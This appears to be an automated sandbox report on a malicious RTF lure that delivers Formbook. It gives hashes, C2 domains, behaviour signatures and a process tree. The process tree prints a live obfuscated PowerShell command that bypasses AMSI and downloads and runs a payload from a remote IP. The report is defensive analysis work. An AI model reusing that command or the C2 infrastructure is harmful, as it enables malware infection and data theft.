Analysis
-
max time kernel
149s -
max time network
122s -
platform
windows7_x64 -
resource
win7v20201028 -
submitted
21-01-2021 10:21
Static task
static1
Behavioral task
behavioral1
Sample
RFQ-9837463.doc.rtf
Resource
win7v20201028
Behavioral task
behavioral2
Sample
RFQ-9837463.doc.rtf
Resource
win10v20201028
General
-
Target
RFQ-9837463.doc.rtf
-
Size
2.0MB
-
MD5
25af535599ad3e48d6b4713f8e599871
-
SHA1
a293b85372f9b0ffdacb46af40518f1341ddc248
-
SHA256
a8f4da2076bc00264891bc7872e70f245f47807c268fb921fc135b711c817b34
-
SHA512
99b5b3f7606405b629519d35a6d442fee454a3bb2b5a571ae2595eeb0ace33b514d7114a70feae1c740573b1e11cb9528113d8eb51efe06a423858c3a553617b
Malware Config
Extracted
formbook
http://www.priscilafiorini.com/rcm/
stunninggfe-ready.today
mlmtalks.com
mountainpeakcafe.com
vlmportraits.com
broskiusa.com
yunquenet.com
webinargifts.com
theatomicclean.com
baselinefibertothehome.net
newworldnails.net
plbmw.com
natsringswerp.com
h2o4all.life
alcoholxpress.com
heliumantennaguide.com
amazon-account-app-service.com
gandhiinfotech.com
abacapitals.com
daoxfi.com
radiocota.com
kuroneko-goethe.life
id.coffee
florhodge.com
eca-group.net
vflat.world
manomkt.com
like.vision
mortgagerefinancinginc.com
vulture-yachts.com
xn--hy1bu0vivd7pa.com
croghen.com
xlcsff2020.xyz
doricwilson.com
freisaq.com
innopre.com
newyorkbr.com
fnnanowesterncanada.com
onlinetourspty.com
player-wheels.net
bloomingtonphotography.com
manateetreeservices.com
organicpepperseeds.com
jpq.xyz
deservelevel.technology
my-emissions.com
aspenridgewyoming.com
winyourmillion.com
studentfreedomalliance.com
fatisfying.com
profitableonlinebusiness.site
fufumail.com
acuracollisioncertified.com
rabbicloud.com
dsgqhg.com
beeriderrebates.com
homesecurityfortpierce.com
luabreupersonalizados.com
fashioncentsconsignments.com
buckislandfarms.com
m6onthego.com
triciavogt.com
orgasmornothing.com
iwrfwe.com
testfixmybariatrics.com
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
Powershell.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1208 1628 Powershell.exe -
Formbook Payload 3 IoCs
Processes:
resource yara_rule behavioral1/memory/1464-25-0x000000000041EBE0-mapping.dmp formbook behavioral1/memory/1464-24-0x0000000000400000-0x000000000042E000-memory.dmp formbook behavioral1/memory/672-33-0x00000000000C0000-0x00000000000EE000-memory.dmp formbook -
Blocklisted process makes network request 1 IoCs
Processes:
Powershell.exeflow pid process 7 1208 Powershell.exe -
Drops file in System32 directory 1 IoCs
Processes:
Powershell.exedescription ioc process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk Powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious use of SetThreadContext 3 IoCs
Processes:
Powershell.execontrol.execolorcpl.exedescription pid process target process PID 1208 set thread context of 1464 1208 Powershell.exe control.exe PID 1464 set thread context of 1276 1464 control.exe Explorer.EXE PID 672 set thread context of 1276 672 colorcpl.exe Explorer.EXE -
Drops file in Windows directory 1 IoCs
Processes:
WINWORD.EXEdescription ioc process File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE -
Office loads VBA resources, possible macro or embedded object present
-
Launches Equation Editor 1 TTPs 1 IoCs
Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.
-
Processes:
WINWORD.EXEdescription ioc process Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Toolbar WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" WINWORD.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote WINWORD.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
WINWORD.EXEpid process 1732 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 35 IoCs
Processes:
Powershell.execontrol.execolorcpl.exepid process 1208 Powershell.exe 1208 Powershell.exe 1208 Powershell.exe 1208 Powershell.exe 1208 Powershell.exe 1208 Powershell.exe 1208 Powershell.exe 1208 Powershell.exe 1464 control.exe 1464 control.exe 672 colorcpl.exe 672 colorcpl.exe 672 colorcpl.exe 672 colorcpl.exe 672 colorcpl.exe 672 colorcpl.exe 672 colorcpl.exe 672 colorcpl.exe 672 colorcpl.exe 672 colorcpl.exe 672 colorcpl.exe 672 colorcpl.exe 672 colorcpl.exe 672 colorcpl.exe 672 colorcpl.exe 672 colorcpl.exe 672 colorcpl.exe 672 colorcpl.exe 672 colorcpl.exe 672 colorcpl.exe 672 colorcpl.exe 672 colorcpl.exe 672 colorcpl.exe 672 colorcpl.exe 672 colorcpl.exe -
Suspicious behavior: MapViewOfSection 5 IoCs
Processes:
control.execolorcpl.exepid process 1464 control.exe 1464 control.exe 1464 control.exe 672 colorcpl.exe 672 colorcpl.exe -
Suspicious use of AdjustPrivilegeToken 43 IoCs
Processes:
Powershell.execontrol.execolorcpl.exedescription pid process Token: SeDebugPrivilege 1208 Powershell.exe Token: SeIncreaseQuotaPrivilege 1208 Powershell.exe Token: SeSecurityPrivilege 1208 Powershell.exe Token: SeTakeOwnershipPrivilege 1208 Powershell.exe Token: SeLoadDriverPrivilege 1208 Powershell.exe Token: SeSystemProfilePrivilege 1208 Powershell.exe Token: SeSystemtimePrivilege 1208 Powershell.exe Token: SeProfSingleProcessPrivilege 1208 Powershell.exe Token: SeIncBasePriorityPrivilege 1208 Powershell.exe Token: SeCreatePagefilePrivilege 1208 Powershell.exe Token: SeBackupPrivilege 1208 Powershell.exe Token: SeRestorePrivilege 1208 Powershell.exe Token: SeShutdownPrivilege 1208 Powershell.exe Token: SeDebugPrivilege 1208 Powershell.exe Token: SeSystemEnvironmentPrivilege 1208 Powershell.exe Token: SeRemoteShutdownPrivilege 1208 Powershell.exe Token: SeUndockPrivilege 1208 Powershell.exe Token: SeManageVolumePrivilege 1208 Powershell.exe Token: 33 1208 Powershell.exe Token: 34 1208 Powershell.exe Token: 35 1208 Powershell.exe Token: SeIncreaseQuotaPrivilege 1208 Powershell.exe Token: SeSecurityPrivilege 1208 Powershell.exe Token: SeTakeOwnershipPrivilege 1208 Powershell.exe Token: SeLoadDriverPrivilege 1208 Powershell.exe Token: SeSystemProfilePrivilege 1208 Powershell.exe Token: SeSystemtimePrivilege 1208 Powershell.exe Token: SeProfSingleProcessPrivilege 1208 Powershell.exe Token: SeIncBasePriorityPrivilege 1208 Powershell.exe Token: SeCreatePagefilePrivilege 1208 Powershell.exe Token: SeBackupPrivilege 1208 Powershell.exe Token: SeRestorePrivilege 1208 Powershell.exe Token: SeShutdownPrivilege 1208 Powershell.exe Token: SeDebugPrivilege 1208 Powershell.exe Token: SeSystemEnvironmentPrivilege 1208 Powershell.exe Token: SeRemoteShutdownPrivilege 1208 Powershell.exe Token: SeUndockPrivilege 1208 Powershell.exe Token: SeManageVolumePrivilege 1208 Powershell.exe Token: 33 1208 Powershell.exe Token: 34 1208 Powershell.exe Token: 35 1208 Powershell.exe Token: SeDebugPrivilege 1464 control.exe Token: SeDebugPrivilege 672 colorcpl.exe -
Suspicious use of FindShellTrayWindow 4 IoCs
Processes:
Explorer.EXEpid process 1276 Explorer.EXE 1276 Explorer.EXE 1276 Explorer.EXE 1276 Explorer.EXE -
Suspicious use of SendNotifyMessage 4 IoCs
Processes:
Explorer.EXEpid process 1276 Explorer.EXE 1276 Explorer.EXE 1276 Explorer.EXE 1276 Explorer.EXE -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
WINWORD.EXEpid process 1732 WINWORD.EXE 1732 WINWORD.EXE -
Suspicious use of WriteProcessMemory 23 IoCs
Processes:
EQNEDT32.EXECmD.exePowershell.exeExplorer.EXEcolorcpl.exedescription pid process target process PID 1104 wrote to memory of 1360 1104 EQNEDT32.EXE CmD.exe PID 1104 wrote to memory of 1360 1104 EQNEDT32.EXE CmD.exe PID 1104 wrote to memory of 1360 1104 EQNEDT32.EXE CmD.exe PID 1104 wrote to memory of 1360 1104 EQNEDT32.EXE CmD.exe PID 1360 wrote to memory of 1344 1360 CmD.exe cscript.exe PID 1360 wrote to memory of 1344 1360 CmD.exe cscript.exe PID 1360 wrote to memory of 1344 1360 CmD.exe cscript.exe PID 1360 wrote to memory of 1344 1360 CmD.exe cscript.exe PID 1208 wrote to memory of 1464 1208 Powershell.exe control.exe PID 1208 wrote to memory of 1464 1208 Powershell.exe control.exe PID 1208 wrote to memory of 1464 1208 Powershell.exe control.exe PID 1208 wrote to memory of 1464 1208 Powershell.exe control.exe PID 1208 wrote to memory of 1464 1208 Powershell.exe control.exe PID 1208 wrote to memory of 1464 1208 Powershell.exe control.exe PID 1208 wrote to memory of 1464 1208 Powershell.exe control.exe PID 1276 wrote to memory of 672 1276 Explorer.EXE colorcpl.exe PID 1276 wrote to memory of 672 1276 Explorer.EXE colorcpl.exe PID 1276 wrote to memory of 672 1276 Explorer.EXE colorcpl.exe PID 1276 wrote to memory of 672 1276 Explorer.EXE colorcpl.exe PID 672 wrote to memory of 1100 672 colorcpl.exe cmd.exe PID 672 wrote to memory of 1100 672 colorcpl.exe cmd.exe PID 672 wrote to memory of 1100 672 colorcpl.exe cmd.exe PID 672 wrote to memory of 1100 672 colorcpl.exe cmd.exe
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\RFQ-9837463.doc.rtf"2⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\colorcpl.exe"C:\Windows\SysWOW64\colorcpl.exe"2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe/c del "C:\WINDOWS\syswow64\control.exe"3⤵
-
C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding1⤵
- Launches Equation Editor
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\CmD.exeCmD.exe /C cscript %tmp%\Client.vbs AC2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cscript.execscript C:\Users\Admin\AppData\Local\Temp\Client.vbs AC3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exePowershell $8B0111F552=[Ref].Assembly.GetType('Sy'+'stem.'+'Mana'+'gem'+'ent'+'.Autom'+'atio'+'n.A'+'m'+'si'+'Utils');$835FFE1926='4456625220575263174452554847';$9FE0AD5C66=[string](0..13|%{[char][int](53+($835FFE1926).substring(($_*2),2))})-replace ' ';$58FB808063=$8B0111F552.GetField($9FE0AD5C66,'Non^^^'.replace('^^^','Pub')+'lic,S'+'tatic');$58FB808063.SetValue($null,$true);($A72F9B815A=$A72F9B815A=Write-Host 'EC4AAB5808223EB722F9C2063ED056665AA80AC5658F9D06815720759C3EB4C4B7065724C3DEFA63DEB58FC3FA9D22121674');$75688686969969696969858588949494985886859594=@(91,82,101,102,93,46,65,115,115,101,109,98,108,121,46,71,101,116,84,121,112,101,40,39,83,121,39,43,39,115,116,101,109,46,39,43,39,77,97,110,97,39,43,39,103,101,109,39,43,39,101,110,116,39,43,39,46,65,117,116,111,109,39,43,39,97,116,105,111,39,43,39,110,46,39,43,36,40,91,67,72,65,114,93,40,57,56,45,51,51,41,43,91,99,72,65,114,93,40,49,50,52,45,49,53,41,43,91,99,104,65,82,93,40,49,49,53,41,43,91,67,72,97,82,93,40,91,66,89,116,101,93,48,120,54,57,41,41,43,39,85,116,105,108,115,39,41,46,71,101,116,70,105,101,108,100,40,36,40,91,67,104,65,114,93,40,91,98,121,116,101,93,48,120,54,49,41,43,91,99,104,97,82,93,40,91,98,89,116,69,93,48,120,54,68,41,43,91,99,104,97,114,93,40,91,98,121,84,101,93,48,120,55,51,41,43,91,99,104,65,114,93,40,49,49,48,45,53,41,43,91,99,104,65,82,93,40,91,66,89,84,69,93,48,120,52,57,41,43,91,99,72,97,82,93,40,57,54,56,48,47,56,56,41,43,91,99,72,97,82,93,40,49,48,53,41,43,91,67,104,97,114,93,40,91,98,89,116,101,93,48,120,55,52,41,43,91,67,104,97,114,93,40,91,66,89,84,69,93,48,120,52,54,41,43,91,99,104,97,114,93,40,49,52,56,45,53,49,41,43,91,99,72,65,82,93,40,57,53,53,53,47,57,49,41,43,91,67,104,65,82,93,40,49,48,56,41,43,91,67,104,65,114,93,40,54,50,54,50,47,54,50,41,43,91,67,104,65,82,93,40,91,98,89,84,69,93,48,120,54,52,41,41,44,39,78,111,110,80,117,98,108,105,99,44,83,116,97,116,105,99,39,41,46,83,101,116,86,97,108,117,101,40,36,110,117,108,108,44,36,116,114,117,101,41,59,40,36,49,68,55,56,53,70,50,56,53,67,61,36,49,68,55,56,53,70,50,56,53,67,61,87,114,105,116,101,45,72,111,115,116,32,39,69,67,52,65,65,66,53,56,48,56,50,50,51,69,66,55,50,50,70,57,67,50,48,54,51,69,68,48,53,54,54,54,53,65,65,56,48,65,67,53,54,53,56,70,57,68,48,54,56,49,53,55,50,48,55,53,57,67,51,69,66,52,67,52,66,55,48,54,53,55,50,52,67,51,68,69,70,65,54,51,68,69,66,53,56,70,67,51,70,65,57,68,50,50,49,50,49,54,55,52,39,41,59,100,111,32,123,36,112,105,110,103,32,61,32,116,101,115,116,45,99,111,110,110,101,99,116,105,111,110,32,45,99,111,109,112,32,103,111,111,103,108,101,46,99,111,109,32,45,99,111,117,110,116,32,49,32,45,81,117,105,101,116,125,32,117,110,116,105,108,32,40,36,112,105,110,103,41,59,36,66,54,55,54,56,48,65,69,49,54,32,61,32,91,69,110,117,109,93,58,58,84,111,79,98,106,101,99,116,40,91,83,121,115,116,101,109,46,78,101,116,46,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,84,121,112,101,93,44,32,51,48,55,50,41,59,91,83,121,115,116,101,109,46,78,101,116,46,83,101,114,118,105,99,101,80,111,105,110,116,77,97,110,97,103,101,114,93,58,58,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,32,61,32,36,66,54,55,54,56,48,65,69,49,54,59,36,69,55,68,69,65,56,68,66,48,51,61,32,78,101,119,45,79,98,106,101,99,116,32,45,67,111,109,32,77,105,99,114,111,115,111,102,116,46,88,77,76,72,84,84,80,59,36,69,55,68,69,65,56,68,66,48,51,46,111,112,101,110,40,39,71,69,84,39,44,39,104,116,116,112,58,47,47,50,48,55,46,49,52,56,46,49,49,48,46,50,57,47,102,116,47,115,104,101,100,46,106,112,103,39,44,36,102,97,108,115,101,41,59,36,69,55,68,69,65,56,68,66,48,51,46,115,101,110,100,40,41,59,36,54,55,52,69,49,54,53,67,56,51,61,91,84,101,120,116,46,69,110,99,111,100,105,110,103,93,58,58,39,85,84,70,56,39,46,39,71,101,116,83,116,114,105,110,103,39,40,91,67,111,110,118,101,114,116,93,58,58,39,70,114,111,109,66,97,115,101,54,52,83,116,114,105,110,103,39,40,36,69,55,68,69,65,56,68,66,48,51,46,114,101,115,112,111,110,115,101,84,101,120,116,41,41,124,73,96,69,96,88);[System.Text.Encoding]::ASCII.GetString($75688686969969696969858588949494985886859594)|I`E`X1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\WINDOWS\syswow64\control.exe"{path}"2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\Client.vbsMD5
4f557ca04c97858443c7f821db0ca8b8
SHA10d00fd81e91c87ae2e17bd050e884000ad1d8a32
SHA25695a6cef0cf6e57371a24367c275196f71c640a7481a0e8fb0b6146f9a6536083
SHA512c05cde005777dd674a52e3e70efd0079b93ff5bf2248b4f6ad7ffb4c8a2f0f7c05cbb320319bf28148606611cf673c725580b0678459c69d6dde797d8cc2a5d4
-
memory/672-30-0x0000000000000000-mapping.dmp
-
memory/672-36-0x0000000000940000-0x00000000009D3000-memory.dmpFilesize
588KB
-
memory/672-35-0x0000000002100000-0x0000000002403000-memory.dmpFilesize
3.0MB
-
memory/672-33-0x00000000000C0000-0x00000000000EE000-memory.dmpFilesize
184KB
-
memory/672-32-0x0000000000CE0000-0x0000000000CF8000-memory.dmpFilesize
96KB
-
memory/1100-34-0x0000000000000000-mapping.dmp
-
memory/1104-5-0x0000000075AE1000-0x0000000075AE3000-memory.dmpFilesize
8KB
-
memory/1208-19-0x000000001C380000-0x000000001C381000-memory.dmpFilesize
4KB
-
memory/1208-18-0x0000000002670000-0x0000000002671000-memory.dmpFilesize
4KB
-
memory/1208-13-0x00000000024B0000-0x00000000024B1000-memory.dmpFilesize
4KB
-
memory/1208-14-0x000000001AB40000-0x000000001AB41000-memory.dmpFilesize
4KB
-
memory/1208-15-0x000000001A9D0000-0x000000001A9D2000-memory.dmpFilesize
8KB
-
memory/1208-16-0x000000001A9D4000-0x000000001A9D6000-memory.dmpFilesize
8KB
-
memory/1208-17-0x0000000002400000-0x0000000002401000-memory.dmpFilesize
4KB
-
memory/1208-12-0x000007FEF55D0000-0x000007FEF5FBC000-memory.dmpFilesize
9.9MB
-
memory/1208-11-0x000007FEFBD61000-0x000007FEFBD63000-memory.dmpFilesize
8KB
-
memory/1208-20-0x000000001B630000-0x000000001B631000-memory.dmpFilesize
4KB
-
memory/1208-21-0x000000001A9DA000-0x000000001A9F9000-memory.dmpFilesize
124KB
-
memory/1208-23-0x000000001C630000-0x000000001C674000-memory.dmpFilesize
272KB
-
memory/1276-29-0x0000000004F40000-0x0000000005053000-memory.dmpFilesize
1.1MB
-
memory/1344-7-0x0000000000000000-mapping.dmp
-
memory/1344-10-0x0000000002810000-0x0000000002814000-memory.dmpFilesize
16KB
-
memory/1360-6-0x0000000000000000-mapping.dmp
-
memory/1464-28-0x0000000000200000-0x0000000000214000-memory.dmpFilesize
80KB
-
memory/1464-27-0x0000000000700000-0x0000000000A03000-memory.dmpFilesize
3.0MB
-
memory/1464-24-0x0000000000400000-0x000000000042E000-memory.dmpFilesize
184KB
-
memory/1464-25-0x000000000041EBE0-mapping.dmp
-
memory/1564-22-0x000007FEF6400000-0x000007FEF667A000-memory.dmpFilesize
2.5MB
-
memory/1732-2-0x0000000072911000-0x0000000072914000-memory.dmpFilesize
12KB
-
memory/1732-4-0x000000005FFF0000-0x0000000060000000-memory.dmpFilesize
64KB
-
memory/1732-3-0x0000000070391000-0x0000000070393000-memory.dmpFilesize
8KB